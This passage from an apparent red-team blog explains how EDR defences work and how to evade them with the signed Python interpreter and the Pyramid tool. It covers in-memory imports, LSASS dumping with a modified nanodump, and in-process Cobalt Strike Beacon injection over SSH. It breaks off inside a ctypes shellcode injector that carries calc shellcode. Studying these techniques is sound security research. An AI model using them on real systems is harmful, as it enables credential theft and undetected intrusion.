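    "seen_on_many_hosts": -1.0,
}
BIAS = 0.0


def malware_probability(features: dict) -> float:
    """Logistic score over binary features (1 = present, 0 = absent)."""
    z = BIAS + sum(WEIGHTS[name] * features.get(name, 0) for name in WEIGHTS)
    return 1.0 / (1.0 + math.exp(-z))


unsigned = {"has_encrypted_sections": 1, "suspicious_api_sequence": 1}
signed = dict(unsigned, digitally_signed=1, seen_on_many_hosts=1)

print(round(malware_probability(unsigned), 2))
print(round(malware_probability(signed), 2))
```

<p>With these invented numbers the same suspicious behaviour scores much lower once the sample is signed and widely seen, which is the effect an attacker hopes to obtain by operating from a signed binary.</p>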

<p>Another dynamic feature that can be abused by properly choosing the binary under which to operate is the API call sequence. This would work well for malware samples but</p>

<p class="notice--warning"><strong>what about malicious code that gets executed in-memory by an interpreter?</strong></p>

<p>In that case, the API call sequence made by the interpreter binary can be virtually <strong>anything</strong> because it depends on the code run by the interpreter. How are security vendors handling that?
I don’t have exact answers to these questions but we can test EDRs behaviour and draw some conclusions.</p>

<h4 id="iocs-and-ioas">IoCs and IoAs</h4>

<p>One definition of IoC is “an object or activity that, observed on a network or on a device, indicates a high probability of unauthorized access to the system”, in other words, IoCs are signatures of known-bad properties or actions performed by malware.
IoCs are useful for forensic intelligence after an attack has occurred, but they can also produce false positives and their effectiveness is limited to techniques and malware currently known by defenders.</p>

<p>On the other hand, Indicators of Attack (IoAs) can be defined as indicators stating that an attack is ongoing. The indicator results from the correlation of actions deemed malicious made by an attacker and the systems/binaries involved.
IoAs are not as useful as IoCs for forensic purposes but can be much more useful in identifying an ongoing attack.</p>
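
<p>The difference between the two can be sketched in a few lines. In this illustration an IoC is an exact lookup against known-bad artifacts (the MD5 of the harmless EICAR test file is used as the sample entry), while an IoA is an ordered correlation of events; the event names and the rule itself are hypothetical.</p>

```python
# Known-bad artifact list for illustration: MD5 of the EICAR test file.
KNOWN_BAD_HASHES = {"44d88612fea8a8f36de82e1278abb02f"}

# A made-up IoA rule: an Office process spawns a shell, and that shell
# later opens a network connection.
IOA_SEQUENCE = ["office_spawns_shell", "shell_network_connection"]


def ioc_match(file_md5: str) -> bool:
    """IoC: exact match against a list of known-bad artifacts."""
    return file_md5.lower() in KNOWN_BAD_HASHES


def ioa_match(events: list) -> bool:
    """IoA: the rule's steps occur in order, with other events allowed between."""
    remaining = iter(events)
    # 'step in remaining' consumes the iterator up to the first match,
    # so the steps must appear in the given order.
    return all(step in remaining for step in IOA_SEQUENCE)
```

<p>The IoC check only fires on artifacts already known to defenders, whereas the IoA check does not care which binary is involved as long as the sequence of actions matches.</p>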

<h3 id="bypass-strategy">Bypass Strategy</h3>

<p>Knowing some key concepts, although very basic, about the common Defenses put in place by EDRs can help shape a bypass strategy.
Abstracting the technical details and digesting the information keeping an offensive mindset, we could summarize the previously listed Defenses in the following statements:</p>

<ol>
  <li>Usermode Hooking is applied only to certain APIs and can be circumvented from usermode.</li>
  <li>Kernel Callbacks cannot be circumvented from usermode but are mainly used to provide visibility on newly created processes and loaded images, and to trigger the EDR’s DLL injection into newly created processes.</li>
  <li>Executing C2 payloads will increase the risk for detection by memory scans and may trigger IoCs.</li>
  <li>ML-based detections can assign a bad score to unknown and unsigned binaries, and a better score to signed and widely used binaries.</li>
  <li>IoAs can detect a malicious action by analyzing anomalies of the steps taken in executing that action.</li>
</ol>

<p>Each of the statements is an approximation and does not fully represent the characteristics of a single Defense, but they still provide useful information on key properties that can be exploited for a bypass.
I hate analogies when it comes to IT topics, but the statements can be seen as ski-gates for a ski track (bypass) that does not exist yet. We just have to draw one possible track keeping the gates as boundaries.</p>

<h4 id="main-categories-of-edr-evasion-operations">Main Categories of EDR Evasion operations</h4>

<p>When it comes to evading an EDR, there are four main categories of operations:</p>

<ol>
  <li><strong>Avoiding the EDR</strong> - this can be accomplished by operating from VPN, proxying traffic, or compromising only targets not equipped with EDRs.</li>
  <li><strong>Blending into the environment</strong> - Executing operations abusing tools and actions commonly observed in the target network (e.g. administrative RDP sessions, usage of legit Administrative tools, Teams <a href="https://github.com/Flangvik/TeamFiltration">abuse</a>, outgoing SSH traffic, internal WinRM sessions etc.).</li>
  <li><strong>EDR tampering</strong> - this category involves disabling or limiting EDR’s features or visibility in order to perform tasks without triggering an EDR response or without sending alerts to the central repository. For more details please check this awesome <a href="https://www.infosec.tirol/how-to-tamper-the-edr/">blogpost</a>: “How To Tamper the EDR” by my friend Daniel Feichter <a href="https://mobile.twitter.com/virtualallocex">@VirtualallocEx</a></li>
  <li><strong>Operating in blind spots</strong> - EDRs have finite resources and finite visibility, so blind spots are always present. Operating within blind spots is powerful since it carries the least risk of being detected.</li>
</ol>

<p>One can relate the categories to a corresponding risk for the relevant type of operation. I depicted the risk brought by each type of operation in a Pyramid of Pain (Attacker’s Version), where the layers of the Pyramid are ordered bottom-up by the amount of risk introduced by the operation type.</p>

<table>
  <thead>
    <tr>
      <th style="text-align: center"><img src="/images/Pyramid_of_Pain_attacker_version.png" alt="image-center" title="Mapping risk levels to EDR Evasion category" class="align-center" /></th>
    </tr>
  </thead>
  <tbody>
    <tr>
      <td style="text-align: center"><em>Attacker’s Pyramid of Pain - Mapping risk levels to EDR Evasion category</em></td>
    </tr>
  </tbody>
</table>

<p>Avoiding EDRs is not always viable for the whole operation, especially for multi-month ones.
Ideally an attacker would want to operate in the bottom layer of the Pyramid in order to minimize the risk of being detected by EDRs. However, this type of operation must be backed by techniques and capabilities that usually require some amount of research to identify and exploit blindspots.
As attackers, we decided to follow this route and the following paragraphs will outline the strategy employed.</p>

<h4 id="operational-constraints">Operational constraints</h4>

<p>We should now define some constraints and limitations under which we want to operate. The EDR avoidance category is basically ruled out, because we want to focus on finding and exploiting EDRs’ blind spots and also because avoiding EDRs at every stage of an operation is not always feasible.
For that reason we’ll want to:</p>
<ol>
  <li><strong>operate directly on an EDR equipped box</strong> without proxying traffic or avoiding engagement with EDRs.</li>
  <li><strong>be able to operate mainly agentless</strong> in order to keep memory indicators low and perform common post-exploitation tasks without needing a C2 agent running.</li>
  <li><strong>avoid remote process injection and dropping malicious artifacts on disk</strong> for the very same reason of keeping memory indicators low.</li>
  <li><strong>keep C2 agent execution capability as a last-resort</strong> since in some cases we’ll have to accept the tradeoff risk to get extended C2 features available.</li>
</ol>

<p>To operate in such a scenario we would need some capabilities in our tooling, such as:</p>

<ol>
  <li>Dynamic module loading</li>
  <li>Compatibility with community-driven tools</li>
  <li>Traffic tunneling without spawning new processes</li>
</ol>

<h4 id="choosing-a-language">Choosing a language</h4>

<p>Operations require capabilities that in turn are coded in a programming language. So it makes sense to start first by choosing a programming language that could be functional in finding blind spots <strong>AND</strong> accelerate capabilities development.</p>

<p>The programming language that would better fit the scenario in which we’ll be operating should have the following requirements:</p>
<ol>
  <li>the programming language of choice should be a <strong>non-native language</strong> (to avoid using custom compiled malicious artifacts) and provide a <strong>signed interpreter</strong> to execute code.</li>
  <li>it must be possible to <strong>execute code without directly installing tools</strong> on the target machine.</li>
  <li>existing public <strong>tooling in that same language could be imported</strong>.</li>
  <li>additional <strong>capabilities could be developed without much hassle</strong>.</li>
  <li>it should <strong>provide the least possible amount of optics to EDRs</strong>.</li>
</ol>

<p>The candidate languages were F#, Javascript, C# and Python. However, after having excluded languages with optics integrated into the OS (such as <a href="https://docs.microsoft.com/it-it/windows/win32/amsi/antimalware-scan-interface-portal">AMSI</a> for C# and F#) or with little public offensive tooling available, Python seemed the most promising candidate.
As a matter of fact, Python can satisfy the above requirements since:</p>
<ol>
  <li>Python is an interpreted language and officially comes with a signed interpreter. It’s not tightly integrated with OS optics since Python uses native system APIs directly and existing monitoring tools either suffer from limited context or can be bypassed. <a href="https://peps.python.org/pep-0578/">PEP-578</a> wanted to solve this issue, since there is <strong>no native way of monitoring what’s happening during a Python script execution</strong>. However, as we’ll see later, the issue is not solved yet.</li>
  <li>Python.org distributes <a href="https://www.python.org/downloads/release/python-3104/">Windows Embeddable zip packages</a> containing a minimal Python environment that does not require installation.</li>
  <li>There is a huge amount of public tooling available written in Python that can be imported and used.</li>
  <li>Python can provide access to Windows APIs via <a href="https://docs.python.org/3/library/ctypes.html">ctypes</a> and shellcode can be injected into the Python process itself using Python, which theoretically allows the execution of any managed code or the development of any capability in Python (C# assemblies could also be run using <a href="https://github.com/TheWover/donut">Donut</a>).</li>
</ol>
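
<p>The first point is worth a small illustration. PEP-578 audit hooks do exist in CPython 3.8 and later, but they are opt-in: events are only delivered to hooks that the running process (or a custom build of the interpreter) registers. The sketch below registers a hook with <code class="language-plaintext highlighter-rouge">sys.addaudithook</code> and records a few standard event names while a string of source is compiled and executed; the hook function and the list name are assumptions made for the example.</p>

```python
import sys

seen_events = []


def audit(event: str, args: tuple) -> None:
    # Record only a few event names; a real hook would forward them somewhere.
    if event in ("compile", "exec", "import"):
        seen_events.append(event)


# Audit hooks are opt-in: nothing is recorded unless the process adds one.
sys.addaudithook(audit)

# Dynamically executed source, similar to what an in-memory loader would do.
exec(compile("answer = 6 * 7", "in-memory", "exec"))

print(sorted(set(seen_events)))
```

<p>A stock python.exe started by an attacker registers no such hook, so none of this telemetry is produced unless the defender controls how the interpreter is built or launched.</p>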

<p>The above-listed properties indicate what could be a candidate blindspot within which we can build capabilities and test their effectiveness against EDRs. The fact that currently there isn’t an out-of-the-box way to inspect dynamic Python code execution opens up a very interesting avenue for attackers.</p>

<p>Furthermore, <strong>Python is widely used and its (signed) interpreter directly executes Windows API calls depending on the Python code run</strong>. This implies an enormous variety of telemetry and API calls coming from the very same binary (python.exe or pythonw.exe), which brings precious extra points when it comes to operating undetected by EDRs.
In fact, it will likely be difficult for EDR vendors to spot anomalies (and build detections) coming from python.exe when its baseline telemetry is so varied.</p>

<p>All things considered, Python provides some unique opportunities that can be exploited to operate in EDRs’ blindspot.</p>

<h3 id="leveraging-python">Leveraging Python</h3>

<p>To help operate within the blindspots provided by Python I wrote a tool named Pyramid (available on my <a href="https://github.com/naksyn/Pyramid">github</a>).
The tool’s aim is to leverage Python to operate in the blindspots identified previously by currently using four main techniques:</p>

<ol>
  <li>Execution Method - Dropping and running python.exe from “Windows Embeddable Zip Package”.</li>
  <li>Dynamic in-memory loading and execution of Python code.</li>
  <li>Beacon Object Files execution via shellcode.</li>
  <li>In-process C2 Agent injection.</li>
</ol>

<h4 id="execution-method">Execution Method</h4>

<p>The execution method for our techniques should aim at creating the least possible amount of suspicious indicators that could trigger an anomaly or a detection.
Thinking about the Defenses, one could trick ML detections by using the signed Python interpreter and IoAs by avoiding uncommon process tree patterns.</p>

<p>So the simplest way to achieve this would be dropping the Windows Embeddable zip package in a user folder or share and launching python.exe (or pythonw.exe) directly, without spawning it from C2 agents or unknown binaries.
This action would mimic a common execution of Python and would unlikely be flagged as malicious by EDRs.</p>

<h4 id="dynamic-in-memory-import">Dynamic in-memory import</h4>

<p>The technique of importing dynamically in-memory Python modules has been around for quite some time and some great previous work has been done by <a href="">xorrior</a> with <a href="https://github.com/EmpireProject/EmPyre">Empyre</a>, <a href="https://twitter.com/scythe_io">scythe_io</a> with <a href="https://arxiv.org/abs/2103.15202">in-memory Embedding of CPython</a>, <a href="https://twitter.com/ajpc500">ajpc500</a> with <a href="https://github.com/MythicAgents/Medusa">Medusa</a>.</p>

<p>The core of Dynamic import is <a href="https://peps.python.org/pep-0302/">PEP-302 “New Import Hooks”</a>, which describes how to modify the logic by which Python modules are located and loaded. Python normally imports a module from a path on disk where the module is located.
However, we want to import modules in memory, not from disk.</p>

<p>Import hooks allow you to modify the logic by which Python modules are located and loaded. This involves defining a custom “Finder” class and adding finder objects to <a href="https://docs.python.org/3/library/sys.html">sys.meta_path</a>.
sys.meta_path holds entries that implement Python’s default import semantics (you can view an example <a href="https://docs.python.org/2/tutorial/modules.html">here</a>).</p>

<p>So basically to use PEP-302 and be able to import modules in-memory one should:</p>

<ol>
  <li>Use a custom Finder class. Pyramid’s finder class is based on the <a href="https://github.com/EmpireProject/EmPyre">Empyre</a> one.</li>
  <li>In-memory download a Python package as a zip.</li>
  <li>Add the zip file finder object to sys.meta_path.</li>
  <li>Import the zip file in memory.</li>
</ol>
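
<p>The steps above can be sketched with the modern importlib API. This is a minimal illustration and not Pyramid’s actual finder: the class name InMemoryZipFinder and the package name mempkg are made up, the zip is built locally instead of being downloaded, and only pure-Python modules are handled.</p>

```python
import importlib.abc
import importlib.util
import io
import sys
import zipfile


class InMemoryZipFinder(importlib.abc.MetaPathFinder, importlib.abc.Loader):
    """Finder and loader serving modules from a zip archive held in memory."""

    def __init__(self, zip_bytes: bytes):
        self._zip = zipfile.ZipFile(io.BytesIO(zip_bytes))
        self._names = set(self._zip.namelist())

    def _locate(self, fullname):
        base = fullname.replace(".", "/")
        if base + "/__init__.py" in self._names:
            return base + "/__init__.py", True   # package
        if base + ".py" in self._names:
            return base + ".py", False           # plain module
        return None

    def find_spec(self, fullname, path=None, target=None):
        found = self._locate(fullname)
        if found is None:
            return None  # let the next finder in sys.meta_path try
        return importlib.util.spec_from_loader(
            fullname, self, origin="memory:" + found[0], is_package=found[1]
        )

    def create_module(self, spec):
        return None  # use the default module creation

    def exec_module(self, module):
        filename, _ = self._locate(module.__name__)
        source = self._zip.read(filename)
        exec(compile(source, filename, "exec"), module.__dict__)


# Build a tiny package in memory; in practice the bytes would be downloaded.
buf = io.BytesIO()
with zipfile.ZipFile(buf, "w") as zf:
    zf.writestr("mempkg/__init__.py", "from .greet import hello\n")
    zf.writestr("mempkg/greet.py", "def hello():\n    return 'hi from memory'\n")

sys.meta_path.insert(0, InMemoryZipFinder(buf.getvalue()))

import mempkg

print(mempkg.hello())
```

<p>Placing the finder at the front of sys.meta_path means it is consulted before the default path-based finders, so nothing has to exist on disk for the import to succeed.</p>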

<p>There are some limitations though. Firstly, PEP-302 does not support importing Python extensions (*.pyd files). Secondly, if you are importing in-memory a package with lots of dependencies, this will bring conflicts between them (dependency nightmare) that need to be sorted out.</p>

<p>The first problem is the most complex one, since to in-memory import *.pyd files the CPython interpreter needs to be re-engineered and recompiled (that’s what scythe_io <a href="https://arxiv.org/abs/2103.15202">did</a>), hence losing the precious digital signature.
We can avoid losing the Python interpreter digital signature by dropping on disk the *.pyd files needed for the Python dependency that we want to import in-memory.</p>

<p>In fact, looking at the normal Python behavior when it comes to importing *.pyd files (that are essentially dlls), we can see that under the hood they are loaded using the windows API <a href="https://docs.microsoft.com/en-us/windows/win32/api/libloaderapi/nf-libloaderapi-loadlibraryexa">LoadLibraryEx</a> and taking the path on disk.
We can accept a tradeoff and import pyd files by dropping them on disk and continue importing in-memory all the other modules that do not require *.pyd files.
This will allow us to maintain the interpreter digital signature and we’ll use the normal Python behaviour in loading the extensions.</p>

<table>
  <thead>
    <tr>
      <th style="text-align: center"><img src="/images/loading_pyd.png" alt="image-center" title="Normal Python behaviour for loading pyd files" class="align-center" /></th>
    </tr>
  </thead>
  <tbody>
    <tr>
      <td style="text-align: center"><em>Normal Python behaviour for loading pyd files</em></td>
    </tr>
  </tbody>
</table>
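
<p>The tradeoff described above amounts to splitting a package archive in two: files that can stay in memory and native extensions that must be written to disk before import. A rough sketch of that split, assuming a hypothetical helper named split_archive and a zip held in a bytes object:</p>

```python
import importlib.machinery
import io
import zipfile

# Suffixes of native extension modules. The interpreter's own list is
# platform-specific, so ".pyd" is added explicitly for this illustration.
EXTENSION_SUFFIXES = tuple(set(importlib.machinery.EXTENSION_SUFFIXES) | {".pyd"})


def split_archive(zip_bytes: bytes):
    """Return (in_memory, on_disk) name lists for a package archive."""
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        # Skip directory entries, keep regular files only.
        names = [n for n in zf.namelist() if not n.endswith("/")]
    on_disk = [n for n in names if n.endswith(EXTENSION_SUFFIXES)]
    in_memory = [n for n in names if n not in on_disk]
    return in_memory, on_disk
```

<p>Everything in the first list can be served by an in-memory finder, while the second list is what ends up on disk and is loaded through the interpreter’s normal extension-loading path.</p>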

<p>The second problem has been solved by manually addressing every dependency issue while importing the packages python-bloodhound, paramiko and impacket secretsdump, and by providing the fixed dependencies in Pyramid to use with a frozen version of the target packages.
The technique execution flow is depicted in the following scheme:</p>

<table>
  <thead>
    <tr>
      <th style="text-align: center"><img src="/images/exec_flow_1.png" alt="image-center" title="Dynamically importing and executing BloodHound-Python/secretsdump" class="align-center" /></th>
    </tr>
  </thead>
  <tbody>
    <tr>
      <td style="text-align: center"><em>Dynamically importing and executing BloodHound-Python/secretsdump with Pyramid</em></td>
    </tr>
  </tbody>
</table>

<p>Here’s a demonstration of using Pyramid to run Python-BloodHound from python.exe after having imported its dependencies in-memory. Only the Cryptodome wheel has been dropped on disk because it contains pyd files used by BloodHound.</p>

<div class="gdrive-wrapper">
  <iframe src="https://drive.google.com/file/d/1fpoMqD9DXL4wY4RfvCqWw-MUGF80xbMR/preview" allowfullscreen=""></iframe>
</div>

<p>In the following video Pyramid has also been used to dynamically in-memory import impacket-secretsdump.</p>

<div class="gdrive-wrapper">
  <iframe src="https://drive.google.com/file/d/18yY5S1xuTaG1sWqKIQmTElnD6OvalGMn/preview" allowfullscreen=""></iframe>
</div>


<h4 id="beacon-object-file-execution-via-shellcode">Beacon Object File execution via shellcode</h4>

<p>This technique has already been introduced in <a href="https://www.naksyn.com/injection/2022/02/16/running-cobalt-strike-bofs-from-python.html">my previous blogpost</a>, however, the TL;DR is that we can use <a href="https://github.com/trustedsec/COFFLoader">COFFloader</a> and <a href="https://github.com/FalconForceTeam/BOF2shellcode">BOF2Shellcode</a> to execute Beacon Object Files via shellcode.
The shellcode can then be injected directly into python.exe using Python and <a href="https://docs.python.org/3/library/ctypes.html">ctypes</a>.</p>

<p>We can dump lsass directly from Python.exe using <a href="https://github.com/helpsystems/nanodump">nanodump</a>, but we need to modify it a bit in order to work with our technique.
Since we’ll be executing a BOF without a Cobalt Strike Beacon running, we should get rid of all the internal Beacon API calls because otherwise the BOF will crash.
We should also hardcode command line parameters to increase BOF execution stability thus getting rid of command line parsing functions.
Finally, we can choose our preferred method of dumping lsass and hardcode it too.</p>

<p>Bear in mind that with this technique <strong>no pyd files are dropped on disk</strong>.</p>

<p>The technique execution flow is depicted in the following scheme:</p>

<table>
  <thead>
    <tr>
      <th style="text-align: center"><img src="/images/exec_flow_3.png" alt="image-center" title="Dumping LSASS with Pyramid and nanodump" class="align-center" /></th>
    </tr>
  </thead>
  <tbody>
    <tr>
      <td style="text-align: center"><em>Dumping LSASS with Pyramid and nanodump</em></td>
    </tr>
  </tbody>
</table>

<p>In the following video Pyramid has been executed to dump lsass on a machine equipped with a top-tier EDR (details have been blurred and I won’t name EDR product) using nanodump BOF and <a href="https://billdemirkapi.me/abusing-windows-implementation-of-fork-for-stealthy-memory-operations/">process forking technique</a>.</p>

<div class="gdrive-wrapper">
  <iframe src="https://drive.google.com/file/d/15mpJLH5AjOvmUz_CF2boaBMlsJt-C6uq/preview" allowfullscreen=""></iframe>
</div>

<p>You can find the modified nanodump used for the demo <a href="https://github.com/naksyn/Pyramid/tree/main/nanodump-main">here on my github</a></p>

<h4 id="in-process-c2-agent-injection">In-process C2 agent injection</h4>

<p>Executing a C2 agent increases the chances of detection by memory scans, however certain scenarios might require an agent execution for the operation to continue.
For this reason Pyramid provides the capability of executing a C2 agent stager and tunnelling its traffic through SSH, all within the python.exe process.
This is achieved by first dynamically importing paramiko and then starting SSH local port forwarding to an attacker controlled SSH server in a new local thread.</p>

<p>The C2 agent shellcode is then injected and executed in-process. The stager should be generated using the host 127.0.0.1 as C2 server with the same port opened locally by the SSH local port forward.
The technique execution flow is depicted in the following scheme:</p>

<table>
  <thead>
    <tr>
      <th style="text-align: center"><img src="/images/exec_flow_2.png" alt="image-center" title="In-process tunneling a Cobalt Strike Beacon with Python" class="align-center" /></th>
    </tr>
  </thead>
  <tbody>
    <tr>
      <td style="text-align: center"><em>In-process tunneling a Cobalt Strike Beacon with Pyramid</em></td>
    </tr>
  </tbody>
</table>

<p>In the following video Pyramid has been executed to perform SSH local port forwarding and executing a Cobalt Strike Beacon stager tunneling its traffic over SSH.
The OS was equipped with a top-tier EDR also in this case.</p>

<div class="gdrive-wrapper">
  <iframe src="https://drive.google.com/file/d/1wZm8BHH7XO7bsD5hISA7U3cxt6Hssn0o/preview" allowfullscreen=""></iframe>
</div>

<h3 id="conclusions">Conclusions</h3>

<p>It has been demonstrated that Python provides some key properties that effectively create blindspots for EDR detection, namely:</p>

<ol>
  <li>Python’s wide usage creates a varied baseline telemetry for the Python interpreter, which natively calls Windows APIs. This can make it harder for EDR vendors to spot anomalies coming from python.exe or pythonw.exe.</li>
  <li>Python lacks transparency for dynamic code executed from python.exe or pythonw.exe.</li>
  <li>Python Foundation officially provides a “Windows embeddable package” that can be used to run Python with a minimal environment without installation. The package comes with signed binaries.</li>
</ol>

<p>These properties, coupled with operational capabilities such as BOF execution, dynamic import of modules and in-process shellcode injection, can help operating in EDRs’ blindspots.
The <a href="https://github.com/naksyn/Pyramid">Pyramid</a> tool has been developed trying to put together all the concepts presented in this post and to bring operational capabilities that can be used from the Python Windows embeddable package.</p>

<h3 id="how-to-defend-from-this">How to defend from this</h3>

<p>One obvious way to defend from these techniques would be to flag Python interpreters as Potentially Unwanted Application, forcing EDR customers to investigate alerts and approve or deny Python usage for specific users. However I don’t think that it’ll be feasible in every situation.
Attackers could also bring their own interpreter and still use these techniques, but in doing so they’ll lose the Interpreter digital signature, so the attack effectiveness will probably be downgraded.</p>

<p>As an EDR vendor, I would also want to analyze python.exe and pythonw.exe behaviour without biases brought by the varied baseline telemetry that they would have.
In this way the Python binaries will be treated as if they were unknown, which is in fact true regarding their behaviour because API calls made by the interpreter are related to the Python code executed.</p>]]></content><author><name>Naksyn</name></author><category term="EDR evasion" /><category term="evasion" /><category term="redteam" /><category term="python" /><category term="pyramid" /><category term="cobalt strike" /><summary type="html"><![CDATA[]]></summary></entry><entry><title type="html">Running Cobalt Strike BOFs from Python</title><link href="https://www.naksyn.com/injection/2022/02/16/running-cobalt-strike-bofs-from-python.html" rel="alternate" type="text/html" title="Running Cobalt Strike BOFs from Python" /><published>2022-02-16T00:00:00-05:00</published><updated>2020-04-13T17:10:20-04:00</updated><id>https://www.naksyn.com/injection/2022/02/16/running-cobalt-strike-bofs-from-python</id><content type="html" xml:base="https://www.naksyn.com/injection/2022/02/16/running-cobalt-strike-bofs-from-python.html"><![CDATA[<p><img src="/images/coff.png" alt="image-center" title="Coughing BOFs from python!" class="align-center" /></p>

<h3 id="tldr">TL;DR</h3>
<p>Python can be used to run Cobalt Strike’s BOFs by building on previous work from <a href="https://github.com/trustedsec/COFFLoader">Trustedsec</a> and <a href="https://medium.com/falconforce/bof2shellcode-a-tutorial-converting-a-stand-alone-bof-loader-into-shellcode-6369aa518548">FalconForce</a>: one can pick a BOF and use <a href="https://github.com/FalconForceTeam/BOF2shellcode">BOF2Shellcode</a> to embed the resulting shellcode in a Python injector. This brings some post-ex capabilities that could be added to existing frameworks or deployed from a gained foothold, making use of a signed binary (python.exe) as a host process for running BOFs via local shellcode injection. A PoC is available on <a href="https://github.com/naksyn/python-bof-runner">my github</a>.</p>

<h3 id="intro">Intro</h3>
<p>Python gained great popularity as a C2 language in recent years and the offsec community brought many great projects like <a href="https://github.com/trustedsec/trevorc2">TrevorC2</a>, <a href="https://github.com/facebookarchive/WEASEL">WEASEL</a>, <a href="https://github.com/n1nj4sec/pupy">pupy</a>, etc. However, its popularity as a Windows-agent-language never really took off, mainly because of some significant limitations such as:</p>
<ol>
  <li>Final .exe size made huge because of Python interpreter dependencies to be included;</li>
  <li>Ease of getting source code from Python artifacts;</li>
  <li>Complexity of creating shellcode that executes python code.</li>
</ol>

<p>These drawbacks stem from the fact that Python is an interpreted language, so you basically have to bring the Python interpreter and its dependencies with you, whether you’re creating a stage(r) shellcode or an .exe to deliver.
However, I would encompass these 3 big limitations under the “Getting Access” phase of an engagement since python will be basically ruled out if you’re trying to phish or exploit some vulnerability that requires stable and tiny shellcode.</p>

<p>But still, to me Python has so much yet to give during the “Post Exploitation” phase, because, well…<strong>“in the EDR era signed binaries are kings”</strong>, and it’s worth reminding that the official Python binary is signed indeed.
It’s also worth mentioning that in enterprise environments devs do crazy stuff so Python is pretty common almost everywhere.
Using python would be a viable way to blend-in on some machines, if we only had modern capabilities to leverage.</p>

<p>This thought has been placed in the backseats of my mind for quite some time, until I saw some recent brilliant projects
that opened up some new avenues.</p>

<h3 id="poc--gtfo">PoC || GTFO</h3>

<p>Earlier in 2021 Kevin Haubris from Trustedsec published a cool project called <a href="https://github.com/trustedsec/COFFLoader">COFFloader</a>, that basically lets you load and run Cobalt Strike’s Beacon Object Files (BOFs) outside of Cobalt Strike itself.
Some weeks ago Gijs Hollestelle from Falconforce published <a href="https://github.com/FalconForceTeam/BOF2shellcode">BOF2Shellcode</a> which essentially converts BOFs to raw shellcode and combines it with COFFLoader (converted too) in a way so that BOFs can be loaded by the same resulting shellcode.</p>

<p>Reading the FalconForce <a href="https://medium.com/falconforce/bof2shellcode-a-tutorial-converting-a-stand-alone-bof-loader-into-shellcode-6369aa518548">post</a> (I highly encourage you to read it too, since Gijs described the whole process to get things working) I understood that one could simply run BOFs with Python as well, by using the shellcode generated by BOF2Shellcode and the help of an injector.
Let’s try this out. As an injector I opted for the local shellcode injection technique using <code class="language-plaintext highlighter-rouge">HeapAlloc</code>, to which I added a <code class="language-plaintext highlighter-rouge">VirtualProtect</code> call to set execute-only permissions since this might be useful for evasion and shenanigans.
Bear in mind that by using execute-only permissions you’re out in the cold if using self-decoding shellcodes or more complex ones.
This only works if the shellcode itself does not need read/write permissions on its own memory, and this might be the case with some BOFs.
Here’s the python injector I used:</p>

<figure class="highlight"><pre><code class="language-python" data-lang="python"><table class="rouge-table"><tbody><tr><td class="code"><pre><span class="s">"""
	Author: @naksyn

	BOF runner using local shellcode injection with HeapAlloc()
	/CreateThread() and setting execute-only permissions with
	VirtualProtect().
	Warning - stagers and shellcodes with self-decoding stubs
	might not work, change permissions accordingly or remove
	the VirtualProtect call by keeping RWX.

"""</span>

<span class="kn">import</span> <span class="nn">ctypes</span>
<span class="kn">from</span> <span class="nn">ctypes</span> <span class="kn">import</span> <span class="o">*</span>
<span class="kn">from</span> <span class="nn">ctypes.wintypes</span> <span class="kn">import</span> <span class="o">*</span>

<span class="c1"># Windows/x64 - Dynamic Null-Free WinExec PopCalc Shellcode (205 Bytes)- Author Bobby Cooke @0xBoku - https://www.exploit-db.com/exploits/49819
</span><span class="n">calc</span> <span class="o">=</span> <span class="sa">b</span><span class="s">"</span><span class="se">\x48\x31\xff\x48\xf7\xe7\x65\x48\x8b\x58\x60\x48\x8b\x5b\x18\x48\x8b\x5b\x20\x48\x8b\x1b\x48\x8b\x1b\x48\x8b\x5b\x20\x49\x89\xd8\x8b</span><span class="s">"</span>
<span class="n">calc</span> <span class="o">+=</span> <span class="sa">b</span><span class="s">"</span><span class="se">\x5b\x3c\x4c\x01\xc3\x48\x31\xc9\x66\x81\xc1\xff\x88\x48\xc1\xe9\x08\x8b\x14\x0b\x4c\x01\xc2\x4d\x31\xd2\x44\x8b\x52\x1c\x4d\x01\xc2</span><span class="s">"</span>
<span class="n">calc</span> <span class="o">+=</span> <span class="sa">b</span><span class="s">"</span><span class="se">\x4d\x31\xdb\x44\x8b\x5a\x20\x4d\x01\xc3\x4d\x31\xe4\x44\x8b\x62\x24\x4d\x01\xc4\xeb\x32\x5b\x59\x48\x31\xc0\x48\x89\xe2\x51\x48\x8b</span><span class="s">"</span>
<span class="n">calc</span> <span class="o">+=</span> <span class="sa">b</span><span class="s">"</span><span class="se">\x0c\x24\x48\x31\xff\x41\x8b\x3c\x83\x4c\x01\xc7\x48\x89\xd6\xf3\xa6\x74\x05\x48\xff\xc0\xeb\xe6\x59\x66\x41\x8b\x04\x44\x41\x8b\x04</span><span class="s">"</span>
<span class="n">calc</span> <span class="o">+=</span> <span class="sa">b</span><span class="s">"</span><span class="se">\x82\x4c\x01\xc0\x53\xc3\x48\x31\xc9\x80\xc1\x07\x48\xb8\x0f\xa8\x96\x91\xba\x87\x9a\x9c\x48\xf7\xd0\x48\xc1\xe8\x08\x50\x51\xe8\xb0</span><span class="s">"</span>
<span class="n">calc</span> <span class="o">+=</span> <span class="sa">b</span><span class="s">"</span><span class="se">\xff\xff\xff\x49\x89\xc6\x48\x31\xc9\x48\xf7\xe1\x50\x48\xb8\x9c\x9e\x93\x9c\xd1\x9a\x87\x9a\x48\xf7\xd0\x50\x48\x89\xe1\x48\xff\xc2</span><span class="s">"</span>
<span class="n">calc</span> <span class="o">+=</span> <span class="sa">b</span><span class="s">"</span><span class="se">\x48\x83\xec\x20\x41\xff\xd6</span><span class="s">"</span>

<span class="n">shellcode</span><span class="o">=</span><span class="n">calc</span>
<span class="n">kernel32</span> <span class="o">=</span> <span class="n">ctypes</span><span class="p">.</span><span class="n">windll</span><span class="p">.</span><span class="n">kernel32</span>
<span class="n">isx64</span> <span class="o">=</span> <span class="n">sizeof</span><span class="p">(</span><span class="n">c_void_p</span><span class="p">)</span> <span class="o">==</span> <span class="n">sizeof</span><span class="p">(</span><span class="n">c_ulonglong</span><span class="p">)</span>

<span class="n">_kernel32</span> <span class="o">=</span> <span class="n">WinDLL</span><span class="p">(</span><span class="s">'kernel32'</span><span class="p">)</span>
<span class="n">HEAP_ZERO_MEMORY</span> <span class="o">=</span> <span class="mh">0x00000008</span>
<span class="n">HEAP_CREATE_ENABLE_EXECUTE</span> <span class="o">=</span> <span class="mh">0x00040000</span>
<span class="n">PAGE_READ_EXECUTE</span> <span class="o">=</span> <span class="mh">0x20</span>
<span class="n">PAGE_EXECUTE</span><span class="o">=</span> <span class="mh">0x10</span>
